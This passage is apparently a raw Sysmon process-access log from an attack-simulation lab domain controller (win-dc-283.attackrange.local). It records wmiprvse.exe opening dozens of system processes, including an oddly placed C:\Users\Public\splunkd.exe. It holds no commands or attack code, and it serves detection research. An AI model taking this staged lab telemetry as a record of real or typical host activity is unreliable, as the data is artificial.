Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029544Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029543Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029542Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029541Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029540Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029539Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029538Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029537Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029536Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029535Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029534Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029533Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029532Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029531Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029530Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029529Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029528Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.515{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029527Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029526Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:35.499{7901BC46-5457-6008-BC06-00000000A301}80125892C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029525Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 